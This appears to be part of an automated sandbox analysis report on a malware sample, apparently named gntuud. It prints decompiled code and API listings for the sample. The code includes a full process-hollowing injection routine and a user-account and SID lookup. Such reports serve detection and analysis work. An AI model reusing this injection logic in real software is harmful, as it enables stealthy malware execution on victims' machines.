																if(__eflags > 0) {
																	goto L61;
																} else {
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t490 - 0x10;
													_t418 =  >=  ? _t506 :  &_v64;
													_t380 = E00417E80(_t418, _v48, "1", 1);
													_t532 = _t532 + 8;
													__eflags = _t380;
													if(_t380 != 0) {
														goto L35;
													} else {
														__eflags = _t490 - 0x10;
														_t418 =  >=  ? _t506 :  &_v64;
														_t381 = E00417E80(_t418, _v48, "2", 1);
														_t532 = _t532 + 8;
														__eflags = _t381;
														if(_t381 != 0) {
															goto L35;
														} else {
															__eflags = _t490 - 0x10;
															_t418 =  >=  ? _t506 :  &_v64;
															_t382 = E00417E80(_t418, _v48, "3", 1);
															_t532 = _t532 + 8;
															__eflags = _t382;
															if(_t382 != 0) {
																goto L35;
															} else {
																__eflags = _t490 - 0x10;
																_t418 =  >=  ? _t506 :  &_v64;
																_t383 = E00417E80(_t418, _v48, "4", 1);
																_t532 = _t532 + 8;
																__eflags = _t383;
																if(_t383 != 0) {
																	goto L35;
																} else {
																	__eflags = _t490 - 0x10;
																	_t418 =  >=  ? _t506 :  &_v64;
																	_t384 = E00417E80(_t418, _v48, "5", 1);
																	_t532 = _t532 + 8;
																	__eflags = _t384;
																	if(_t384 != 0) {
																		goto L35;
																	} else {
																		__eflags = _t490 - 0x10;
																		_t418 =  >=  ? _t506 :  &_v64;
																		_t385 = E00417E80(_t418, _v48, "6", 1);
																		_t532 = _t532 + 8;
																		__eflags = _t385;
																		if(_t385 != 0) {
																			goto L35;
																		} else {
																			__eflags = _t490 - 0x10;
																			_t418 =  >=  ? _t506 :  &_v64;
																			_t386 = E00417E80(_t418, _v48, "7", 1);
																			_t532 = _t532 + 8;
																			__eflags = _t386;
																			if(_t386 != 0) {
																				goto L35;
																			} else {
																				__eflags = _t490 - 0x10;
																				_t418 =  >=  ? _t506 :  &_v64;
																				_t387 = E00417E80(_t418, _v48, "8", 1);
																				_t532 = _t532 + 8;
																				__eflags = _t387;
																				if(_t387 != 0) {
																					goto L35;
																				} else {
																					_t463 = _v48;
																					__eflags = _t490 - 0x10;
																					_t418 =  >=  ? _t506 :  &_v64;
																					_t388 = E00417E80(_t418, _t463, "9", 1);
																					_t532 = _t532 + 8;
																					__eflags = _t388;
																					if(_t388 == 0) {
																						L44:
																						_v20 = 1;
																						__eflags = _t490 - 0x10;
																						if(_t490 < 0x10) {
																							L48:
																							_t275 =  *(_t396 + 0x18);
																							_t463 = _v92 + 1;
																							_v92 = _t463;
																							__eflags = _t463 - _t275;
																							if(_t463 < _t275) {
																								continue;
																							} else {
																								_t418 = _v72;
																								_t506 = _v96;
																								_t490 = _v100;
																								goto L50;
																							}
																						} else {
																							_t490 = _t490 + 1;
																							_t368 = _t506;
																							__eflags = _t490 - 0x1000;
																							if(_t490 < 0x1000) {
																								L47:
																								_push(_t490);
																								E004186BF(_t506);
																								_t532 = _t532 + 8;
																								goto L48;
																							} else {
																								_t506 =  *((intOrPtr*)(_t506 - 4));
																								_t490 = _t490 + 0x23;
																								__eflags = _t368 - _t506 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									L61:
																									E0041CD1C(_t396, _t418, _t463, _t490, __eflags);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t517);
																									_t518 = _t532;
																									_push(0xffffffff);
																									_push(0x4298a9);
																									_push( *[fs:0x0]);
																									_t533 = _t532 - 0x38;
																									_push(_t506);
																									_push(_t490);
																									_t279 =  *0x439008; // 0x2f6e538a
																									_push(_t279 ^ _t518);
																									 *[fs:0x0] =  &_v272;
																									_t507 = _t463;
																									_t491 = _t418;
																									_v276 = _t491;
																									_v276 = _t491;
																									_t419 = _t507;
																									_v356.dwYSize = 0;
																									__eflags =  *((intOrPtr*)(_t507 + 0x14)) - 0x10;
																									if( *((intOrPtr*)(_t507 + 0x14)) >= 0x10) {
																										_t419 =  *_t507;
																									}
																									_push(_v36);
																									_t464 =  *((intOrPtr*)(_t507 + 0x10));
																									_push(2);
																									_t282 = E00417660(_t396, _t419,  *((intOrPtr*)(_t507 + 0x10)), _t491, _t507);
																									_t535 = _t533 - 8 + 0x10;
																									__eflags = _t282 - 0xffffffff;
																									if(_t282 != 0xffffffff) {
																										__eflags =  *((intOrPtr*)(_t507 + 0x10)) - _t282;
																										_v44 = 0;
																										_t283 =  <  ?  *((void*)(_t507 + 0x10)) : _t282;
																										__eflags =  *((intOrPtr*)(_t507 + 0x14)) - 0x10;
																										_v40 = 0xf;
																										_v60 = 0;
																										if( *((intOrPtr*)(_t507 + 0x14)) >= 0x10) {
																											_t507 =  *_t507;
																										}
																										_push(_t283);
																										E00417040( &_v60, _t464, _t507);
																										_t421 =  &_v60;
																										_t285 = 0xa;
																									} else {
																										_push(0);
																										_v68 = 0;
																										_v64 = 0xf;
																										_v84 = 0;
																										E00417040( &_v84, _t464, 0x43432b);
																										_t421 =  &_v84;
																										_t285 = 1;
																									}
																									asm("movups xmm0, [ecx]");
																									 *(_t491 + 0x10) = 0;
																									_t286 = _t285 | 0x00000004;
																									 *(_t491 + 0x14) = 0;
																									asm("movups [edi], xmm0");
																									asm("movq xmm0, [ecx+0x10]");
																									asm("movq [edi+0x10], xmm0");
																									 *(_t421 + 0x10) = 0;
																									 *((intOrPtr*)(_t421 + 0x14)) = 0xf;
																									 *_t421 = 0;
																									__eflags = _t286 & 0x00000002;
																									if((_t286 & 0x00000002) == 0) {
																										L74:
																										__eflags = _t286 & 0x00000001;
																										if((_t286 & 0x00000001) == 0) {
																											L79:
																											 *[fs:0x0] = _v32;
																											return _t491;
																										} else {
																											_t465 = _v64;
																											__eflags = _t465 - 0x10;
																											if(_t465 < 0x10) {
																												goto L79;
																											} else {
																												_t424 = _v84;
																												_t466 = _t465 + 1;
																												_t288 = _t424;
																												__eflags = _t466 - 0x1000;
																												if(_t466 < 0x1000) {
																													L78:
																													_push(_t466);
																													E004186BF(_t424);
																													goto L79;
																												} else {
																													_t424 =  *(_t424 - 4);
																													_t466 =  &(_t466[0x11]);
																													__eflags = _t288 - _t424 + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														goto L80;
																													} else {
																														goto L78;
																													}
																												}
																											}
																										}
																									} else {
																										_t467 = _v40;
																										_t286 = _t286 & 0xfffffffd;
																										_v36 = _t286;
																										__eflags = _t467 - 0x10;
																										if(_t467 < 0x10) {
																											goto L74;
																										} else {
																											_t433 = _v60;
																											_t468 =  &(_t467[0]);
																											_t334 = _t433;
																											__eflags = _t468 - 0x1000;
																											if(_t468 < 0x1000) {
																												L73:
																												_push(_t468);
																												E004186BF(_t433);
																												_t286 = _v36;
																												_t535 = _t535 + 8;
																												goto L74;
																											} else {
																												_t424 =  *(_t433 - 4);
																												_t466 =  &(_t468[0x11]);
																												__eflags = _t334 - _t424 + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													L80:
																													E0041CD1C(_t396, _t424, _t466, _t491, __eflags);
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													_push(_t518);
																													_t520 = _t535;
																													_t293 =  *0x439008; // 0x2f6e538a
																													_v356.lpReserved = _t293 ^ _t520;
																													_push(_t396);
																													_push(_t507);
																													_push(_t491);
																													_t509 = _t424;
																													GetModuleFileNameA(0,  &_v612, 0x104);
																													__eflags =  *_t509 - 0x5a4d;
																													if( *_t509 != 0x5a4d) {
																														L93:
																														VirtualFree(_t509, 0, 0x8000);
																														__eflags = _v28 ^ _t520;
																														return E00418232(_v28 ^ _t520);
																													} else {
																														_t495 =  *((intOrPtr*)(_t509 + 0x3c)) + _t509;
																														__eflags =  *_t495 - 0x4550;
																														if( *_t495 != 0x4550) {
																															goto L93;
																														} else {
																															E00419710(_t495,  &_v356, 0, 0x44);
																															asm("xorps xmm0, xmm0");
																															asm("movups [ebp-0x160], xmm0");
																															_t305 = CreateProcessA( &_v288, 0, 0, 0, 0, 4, 0, 0,  &_v356,  &_v376);
																															__eflags = _t305;
																															if(_t305 == 0) {
																																goto L93;
																															} else {
																																_t398 = VirtualAlloc(0, 4, 0x1000, 4);
																																_v388 = _t398;
																																_t398->ContextFlags = 0x10007;
																																_t307 = GetThreadContext(_v376.hThread, _t398);
																																__eflags = _t307;
																																if(_t307 == 0) {
																																	goto L93;
																																} else {
																																	ReadProcessMemory(_v376.hProcess, "   ",  &_v360, 4, 0);
																																	_t310 =  *(_t495 + 0x34);
																																	__eflags = _v360 - _t310;
																																	if(_v360 == _t310) {
																																		_t332 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
																																		 *_t332(_v376.hProcess, _v360);
																																		_t310 =  *(_t495 + 0x34);
																																	}
																																	_t311 = VirtualAllocEx(_v376.hProcess, _t310,  *(_t495 + 0x50), 0x3000, 0x40);
																																	_v384 = _t311;
																																	__eflags = _t311;
																																	if(_t311 == 0) {
																																		goto L93;
																																	} else {
																																		WriteProcessMemory(_v376.hProcess, _t311, _t509,  *(_t495 + 0x54), 0);
																																		_v380 = 0;
																																		__eflags = 0 -  *(_t495 + 6);
																																		if(0 <  *(_t495 + 6)) {
																																			_t400 = 0;
																																			__eflags = 0;
																																			do {
																																				WriteProcessMemory(_v376.hProcess,  *((intOrPtr*)(_t400 + _t509 +  *((intOrPtr*)(_t509 + 0x3c)) + 0x104)) + _v384,  *((intOrPtr*)(_t400 + _t509 +  *((intOrPtr*)(_t509 + 0x3c)) + 0x10c)) + _t509,  *(_t400 + _t509 +  *((intOrPtr*)(_t509 + 0x3c)) + 0x108), 0);
																																				_t400 = _t400 + 0x28;
																																				_t432 = _v380 + 1;
																																				_v380 = _t432;
																																				__eflags = _t432 - ( *(_t495 + 6) & 0x0000ffff);
																																			} while (_t432 < ( *(_t495 + 6) & 0x0000ffff));
																																			_t398 = _v388;
																																		}
																																		WriteProcessMemory(_v376, _t398->Ebx + 8, _t495 + 0x34, 4, 0);
																																		_t398->Eax =  *((intOrPtr*)(_t495 + 0x28)) + _v384;
																																		SetThreadContext(_v376.hThread, _t398);
																																		ResumeThread(_v376.hThread);
																																		VirtualFree(_t509, 0, 0x8000);
																																		__eflags = _v28 ^ _t520;
																																		return E00418232(_v28 ^ _t520);
																																	}
																																}
																															}
																														}
																													}
																												} else {
																													goto L73;
																												}
																											}
																										}
																									}
																								} else {
																									goto L47;
																								}
																							}
																						}
																					} else {
																						goto L35;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												goto L94;
											}
											L60:
											E00417180(_t418, _t463, __eflags);
											goto L61;
										}
									} else {
										goto L17;
									}
								}
							}
						}
					}
				}
				L94:
			}

0x004037d0
0x004037d1
0x004037d3
0x004037d5
0x004037e0
0x004037e1
0x004037e4
0x004037e9
0x004037eb
0x004037ee
0x004037ef
0x004037f0
0x004037f1
0x004037f5
0x004037fb
0x004037fe
0x00403804
0x0040380d
0x00403811
0x00403818
0x0040381f
0x00403822
0x0040383a
0x00403843
0x00403848
0x0040384a
0x0040384f
0x004039c2
0x004039ce
0x004039d6
0x004039e0
0x004039e5
0x00000000
0x00403855
0x00403858
0x0040385f
0x0040386b
0x0040387f
0x0040388c
0x00403892
0x00403897
0x00000000
0x004038c4
0x004038c4
0x004038c9
0x004038d1
0x00000000
0x004038d7
0x004038d7
0x004038da
0x004038dc
0x004038dc
0x004038e0
0x004038e0
0x004038e3
0x004038e6
0x004038e6
0x004038ed
0x004038f0
0x004038f5
0x004038f8
0x004038fb
0x00403900
0x00403904
0x00403906
0x00403909
0x00403910
0x00403913
0x00403916
0x00403919
0x0040391e
0x0040391e
0x00403910
0x00403928
0x0040392a
0x00403931
0x00403938
0x0040393c
0x0040393c
0x00403940
0x00403940
0x00403942
0x00403943
0x00403949
0x0040394e
0x00403953
0x00403959
0x00403968
0x00403970
0x00403971
0x00403977
0x0040397e
0x00403986
0x00403989
0x0040398e
0x00403994
0x004039be
0x004039eb
0x004039ee
0x00403a06
0x00403996
0x00403996
0x00403999
0x0040399a
0x004039a2
0x004039b4
0x004039b4
0x004039b6
0x00000000
0x004039a4
0x004039a4
0x004039a7
0x004039b2
0x00403a07
0x00403a0c
0x00403a0d
0x00403a0e
0x00403a0f
0x00403a10
0x00403a11
0x00403a19
0x00403a1c
0x00403a20
0x00403a24
0x00403a26
0x00403a28
0x00403a33
0x00403a34
0x00403a35
0x00403a38
0x00403a3d
0x00403a3f
0x00403a42
0x00403a43
0x00403a44
0x00403a48
0x00403a4e
0x00403a50
0x00403a53
0x00403a55
0x00403a58
0x00403a5b
0x00403a5e
0x00403a65
0x00403a67
0x00403a6a
0x00403a71
0x00403a74
0x00403a78
0x00403a7a
0x00403a7d
0x00403a80
0x00403a82
0x00403d6a
0x00403d6a
0x00403d71
0x00403d78
0x00403d7b
0x00403d7e
0x00000000
0x00403d84
0x00403d84
0x00403d84
0x00403d89
0x00403d8b
0x00403d8e
0x00403d95
0x00403d99
0x00403d9a
0x00403d9e
0x00403da3
0x00403da6
0x00403da9
0x00403dd3
0x00403dd3
0x00403dd6
0x00403dd9
0x00403e03
0x00403e08
0x00403e15
0x00403e22
0x00403ddb
0x00403ddb
0x00403dde
0x00403ddf
0x00403de1
0x00403de7
0x00403df9
0x00403df9
0x00403dfb
0x00000000
0x00403de9
0x00403de9
0x00403dec
0x00403df4
0x00403df7
0x00000000
0x00000000
0x00000000
0x00000000
0x00403df7
0x00403de7
0x00403dab
0x00403dab
0x00403dae
0x00403daf
0x00403db1
0x00403db7
0x00403dc9
0x00403dc9
0x00403dcb
0x00403dd0
0x00000000
0x00403db9
0x00403db9
0x00403dbc
0x00403dc4
0x00403dc7
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dc7
0x00403db7
0x00403da9
0x00403a90
0x00403a90
0x00403a90
0x00403a97
0x00403a9e
0x00403aa2
0x00403aa4
0x00000000
0x00000000
0x00403aaa
0x00403ab1
0x00403ab3
0x00403ab6
0x00403abd
0x00403ac1
0x00403ac2
0x00403ac8
0x00403acd
0x00403ad4
0x00403ad7
0x00403ada
0x00403ae0
0x00403aea
0x00403aef
0x00403af2
0x00403af4
0x00403c29
0x00403c29
0x00403c2c
0x00403c2f
0x00403c36
0x00403c3d
0x00403c41
0x00403c43
0x00000000
0x00403c49
0x00403c49
0x00403c50
0x00403c52
0x00403c55
0x00403c5c
0x00403c60
0x00403c61
0x00403c67
0x00403c6f
0x00403c75
0x00403c78
0x00403c7d
0x00403c80
0x00403c85
0x00403c8a
0x00403c8d
0x00403c94
0x00403c9b
0x00403c9e
0x00403ca2
0x00403ca5
0x00403cdc
0x00403cdc
0x00403ce0
0x00403ce3
0x00403ce8
0x00403cec
0x00403cef
0x00000000
0x00403cf1
0x00403cf1
0x00403cf4
0x00403cf5
0x00403cf7
0x00403cfd
0x00403d13
0x00403d13
0x00403d15
0x00403d1a
0x00000000
0x00403cff
0x00403cff
0x00403d02
0x00403d0a
0x00403d0d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d0d
0x00403cfd
0x00403ca7
0x00403ca7
0x00403caa
0x00403cab
0x00403cad
0x00403cb3
0x00403cc9
0x00403cc9
0x00403ccb
0x00403cd0
0x00403cd4
0x00403cd7
0x00000000
0x00403cb5
0x00403cb5
0x00403cb8
0x00403cc0
0x00403cc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00403cc3
0x00403cb3
0x00403ca5
0x00403afa
0x00403b00
0x00403b05
0x00403b0d
0x00403b12
0x00403b15
0x00403b17
0x00000000
0x00403b1d
0x00403b23
0x00403b28
0x00403b30
0x00403b35
0x00403b38
0x00403b3a
0x00000000
0x00403b40
0x00403b46
0x00403b4b
0x00403b53
0x00403b58
0x00403b5b
0x00403b5d
0x00000000
0x00403b63
0x00403b69
0x00403b6e
0x00403b76
0x00403b7b
0x00403b7e
0x00403b80
0x00000000
0x00403b86
0x00403b8c
0x00403b91
0x00403b99
0x00403b9e
0x00403ba1
0x00403ba3
0x00000000
0x00403ba9
0x00403baf
0x00403bb4
0x00403bbc
0x00403bc1
0x00403bc4
0x00403bc6
0x00000000
0x00403bc8
0x00403bce
0x00403bd3
0x00403bdb
0x00403be0
0x00403be3
0x00403be5
0x00000000
0x00403be7
0x00403bed
0x00403bf2
0x00403bfa
0x00403bff
0x00403c02
0x00403c04
0x00000000
0x00403c06
0x00403c06
0x00403c0c
0x00403c11
0x00403c19
0x00403c1e
0x00403c21
0x00403c23
0x00403d1d
0x00403d1d
0x00403d21
0x00403d24
0x00403d4f
0x00403d52
0x00403d55
0x00403d56
0x00403d59
0x00403d5b
0x00000000
0x00403d61
0x00403d61
0x00403d64
0x00403d67
0x00000000
0x00403d67
0x00403d26
0x00403d26
0x00403d27
0x00403d29
0x00403d2f
0x00403d45
0x00403d45
0x00403d47
0x00403d4c
0x00000000
0x00403d31
0x00403d31
0x00403d34
0x00403d3c
0x00403d3f
0x00403e28
0x00403e28
0x00403e2d
0x00403e2e
0x00403e2f
0x00403e30
0x00403e31
0x00403e33
0x00403e35
0x00403e40
0x00403e41
0x00403e44
0x00403e45
0x00403e46
0x00403e4d
0x00403e51
0x00403e57
0x00403e59
0x00403e5b
0x00403e5e
0x00403e61
0x00403e63
0x00403e6a
0x00403e6e
0x00403e70
0x00403e70
0x00403e72
0x00403e75
0x00403e78
0x00403e7d
0x00403e82
0x00403e85
0x00403e88
0x00403eb5
0x00403eb8
0x00403ebf
0x00403ec3
0x00403ec7
0x00403ece
0x00403ed2
0x00403ed4
0x00403ed4
0x00403ed6
0x00403edb
0x00403ee0
0x00403ee3
0x00403e8a
0x00403e8a
0x00403e94
0x00403e9b
0x00403ea2
0x00403ea6
0x00403eab
0x00403eae
0x00403eae
0x00403ee8
0x00403eeb
0x00403ef2
0x00403ef5
0x00403efc
0x00403eff
0x00403f04
0x00403f09
0x00403f10
0x00403f17
0x00403f1a
0x00403f1c
0x00403f57
0x00403f57
0x00403f59
0x00403f8b
0x00403f90
0x00403f9d
0x00403f5b
0x00403f5b
0x00403f5e
0x00403f61
0x00000000
0x00403f63
0x00403f63
0x00403f66
0x00403f67
0x00403f69
0x00403f6f
0x00403f81
0x00403f81
0x00403f83
0x00000000
0x00403f71
0x00403f71
0x00403f74
0x00403f7c
0x00403f7f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403f7f
0x00403f6f
0x00403f61
0x00403f1e
0x00403f1e
0x00403f21
0x00403f24
0x00403f27
0x00403f2a
0x00000000
0x00403f2c
0x00403f2c
0x00403f2f
0x00403f30
0x00403f32
0x00403f38
0x00403f4a
0x00403f4a
0x00403f4c
0x00403f51
0x00403f54
0x00000000
0x00403f3a
0x00403f3a
0x00403f3d
0x00403f45
0x00403f48
0x00403f9e
0x00403f9e
0x00403fa3
0x00403fa4
0x00403fa5
0x00403fa6
0x00403fa7
0x00403fa8
0x00403fa9
0x00403faa
0x00403fab
0x00403fac
0x00403fad
0x00403fae
0x00403faf
0x00403fb0
0x00403fb1
0x00403fb9
0x00403fc0
0x00403fc3
0x00403fc4
0x00403fc5
0x00403fd1
0x00403fd6
0x00403fe1
0x00403fe4
0x004041cd
0x004041d5
0x004041e0
0x004041eb
0x00403fea
0x00403fed
0x00403fef
0x00403ff5
0x00000000
0x00403ffb
0x00404006
0x00404014
0x00404017
0x0040403b
0x00404041
0x00404043
0x00000000
0x00404049
0x0040405a
0x0040405d
0x00404063
0x0040406f
0x00404075
0x00404077
0x00000000
0x0040407d
0x00404093
0x00404099
0x0040409c
0x004040a2
0x004040b5
0x004040c7
0x004040c9
0x004040c9
0x004040dd
0x004040e3
0x004040e9
0x004040eb
0x00000000
0x004040f1
0x004040fe
0x00404106
0x00404110
0x00404114
0x00404116
0x00404116
0x00404118
0x00404142
0x0040414e
0x00404155
0x00404156
0x0040415c
0x0040415c
0x00404160
0x00404160
0x0040417e
0x0040418e
0x0040419a
0x004041a6
0x004041b4
0x004041c2
0x004041cc
0x004041cc
0x004040eb
0x00404077
0x00404043
0x00403ff5
0x00000000
0x00000000
0x00000000
0x00403f48
0x00403f38
0x00403f2a
0x00000000
0x00000000
0x00000000
0x00403d3f
0x00403d2f
0x00000000
0x00000000
0x00000000
0x00403c23
0x00403c04
0x00403be5
0x00403bc6
0x00403ba3
0x00403b80
0x00403b5d
0x00403b3a
0x00403b17
0x00000000
0x00403af4
0x00403e23
0x00403e23
0x00000000
0x00403e23
0x00000000
0x00000000
0x00000000
0x004039b2
0x004039a2
0x00403994
0x004038d1
0x00403897
0x00000000

APIs

GetUserNameW.ADVAPI32 ref: 00403822
GetProcessHeap.KERNEL32(00000008,?), ref: 00403837
HeapAlloc.KERNEL32(00000000), ref: 0040383A
GetUserNameW.ADVAPI32 ref: 00403848
LookupAccountNameW.ADVAPI32 ref: 0040386B
GetProcessHeap.KERNEL32(00000008,?), ref: 00403876
HeapAlloc.KERNEL32(00000000), ref: 00403879
GetProcessHeap.KERNEL32(00000008,?), ref: 00403889
HeapAlloc.KERNEL32(00000000), ref: 0040388C
LookupAccountNameW.ADVAPI32 ref: 004038B6
ConvertSidToStringSidW.ADVAPI32 ref: 004038C9
GetProcessHeap.KERNEL32(00000000,?), ref: 004039C5
HeapFree.KERNEL32(00000000), ref: 004039CE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039D3
HeapFree.KERNEL32(00000000), ref: 004039D6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039DD
HeapFree.KERNEL32(00000000), ref: 004039E0
LocalFree.KERNEL32(00000000), ref: 004039E5

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 763f805ec03708986885300813f112d4a2d66c911ceb533b011a2ab43863eab0
Instruction ID: 89794ae1973fad5ea7192e5804e0dc8d95b01a905eaed68a0387455b0bbf754c
Opcode Fuzzy Hash: 763f805ec03708986885300813f112d4a2d66c911ceb533b011a2ab43863eab0
Instruction Fuzzy Hash: 857160B1E00209ABDB14DFA5DC85BAFBFBCEF49300F40453AE905A7281DB759905CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00972958 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0097299C

Part of subcall function 00972535: _free.LIBCMT ref: 00972552
Part of subcall function 00972535: _free.LIBCMT ref: 00972564
Part of subcall function 00972535: _free.LIBCMT ref: 00972576
Part of subcall function 00972535: _free.LIBCMT ref: 00972588
Part of subcall function 00972535: _free.LIBCMT ref: 0097259A
Part of subcall function 00972535: _free.LIBCMT ref: 009725AC
Part of subcall function 00972535: _free.LIBCMT ref: 009725BE
Part of subcall function 00972535: _free.LIBCMT ref: 009725D0
Part of subcall function 00972535: _free.LIBCMT ref: 009725E2
Part of subcall function 00972535: _free.LIBCMT ref: 009725F4
Part of subcall function 00972535: _free.LIBCMT ref: 00972606
Part of subcall function 00972535: _free.LIBCMT ref: 00972618
Part of subcall function 00972535: _free.LIBCMT ref: 0097262A

_free.LIBCMT ref: 00972991

Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910

_free.LIBCMT ref: 009729B3
_free.LIBCMT ref: 009729C8
_free.LIBCMT ref: 009729D3
_free.LIBCMT ref: 009729F5
_free.LIBCMT ref: 00972A08
_free.LIBCMT ref: 00972A16
_free.LIBCMT ref: 00972A21
_free.LIBCMT ref: 00972A59
_free.LIBCMT ref: 00972A60
_free.LIBCMT ref: 00972A7D
_free.LIBCMT ref: 00972A95

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
Instruction ID: 836c9231bfd6cd889f6c513008bc6e9c29fc9ef20506ac3a9aca1505d3a0155d
Opcode Fuzzy Hash: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
Instruction Fuzzy Hash: 16313832610305AFEB35AB78D945B5A73ECEF80310F68842AF059D7191DB70ED80DB24

Uniqueness

Uniqueness Score: -1.00%

Function 004226F1 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00422735

Part of subcall function 004222CE: _free.LIBCMT ref: 004222EB
Part of subcall function 004222CE: _free.LIBCMT ref: 004222FD
Part of subcall function 004222CE: _free.LIBCMT ref: 0042230F
Part of subcall function 004222CE: _free.LIBCMT ref: 00422321
Part of subcall function 004222CE: _free.LIBCMT ref: 00422333
Part of subcall function 004222CE: _free.LIBCMT ref: 00422345
Part of subcall function 004222CE: _free.LIBCMT ref: 00422357
Part of subcall function 004222CE: _free.LIBCMT ref: 00422369
Part of subcall function 004222CE: _free.LIBCMT ref: 0042237B
Part of subcall function 004222CE: _free.LIBCMT ref: 0042238D
Part of subcall function 004222CE: _free.LIBCMT ref: 0042239F
Part of subcall function 004222CE: _free.LIBCMT ref: 004223B1
Part of subcall function 004222CE: _free.LIBCMT ref: 004223C3

_free.LIBCMT ref: 0042272A

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 0042274C
_free.LIBCMT ref: 00422761
_free.LIBCMT ref: 0042276C
_free.LIBCMT ref: 0042278E
_free.LIBCMT ref: 004227A1
_free.LIBCMT ref: 004227AF
_free.LIBCMT ref: 004227BA
_free.LIBCMT ref: 004227F2
_free.LIBCMT ref: 004227F9
_free.LIBCMT ref: 00422816
_free.LIBCMT ref: 0042282E

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
Instruction ID: 461f1e78c3464bc4a48008cddc69d5b42509e70b2aac72d5241b0bc94f255431
Opcode Fuzzy Hash: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
Instruction Fuzzy Hash: 0E316031B04311EFDB20AA3AE945B9773E8AF50314F91452FE845D7251DBB8EC92872C

Uniqueness

Uniqueness Score: -1.00%

Function 00969E6E Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00969F69
type_info::operator==.LIBVCRUNTIME ref: 00969F90
___TypeMatch.LIBVCRUNTIME ref: 0096A09C
CatchIt.LIBVCRUNTIME ref: 0096A0F1
IsInExceptionSpec.LIBVCRUNTIME ref: 0096A177
_UnwindNestedFrames.LIBCMT ref: 0096A1FE
CallUnexpected.LIBVCRUNTIME ref: 0096A219

Strings

csm, xrefs: 00969FC7
csm, xrefs: 00969EA9
csm, xrefs: 00969F16

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 91fe4b33738a25345e88ffee5e2d1111797d185349d5d2f341cacdd7ca2a9c0e
Instruction ID: 4b33e437b62068abc1fcf9945158e047db20b4ebe833a27b9a4e608c555e4ff5
Opcode Fuzzy Hash: 91fe4b33738a25345e88ffee5e2d1111797d185349d5d2f341cacdd7ca2a9c0e
Instruction Fuzzy Hash: A8C18871800209EFCF29DFA4D881AAEBBB9FF55310F11415AE815BB212D735DA51CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00419C07 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00419D02
type_info::operator==.LIBVCRUNTIME ref: 00419D29
___TypeMatch.LIBVCRUNTIME ref: 00419E35
CatchIt.LIBVCRUNTIME ref: 00419E8A
IsInExceptionSpec.LIBVCRUNTIME ref: 00419F10
_UnwindNestedFrames.LIBCMT ref: 00419F97
CallUnexpected.LIBVCRUNTIME ref: 00419FB2

Strings

csm, xrefs: 00419D60
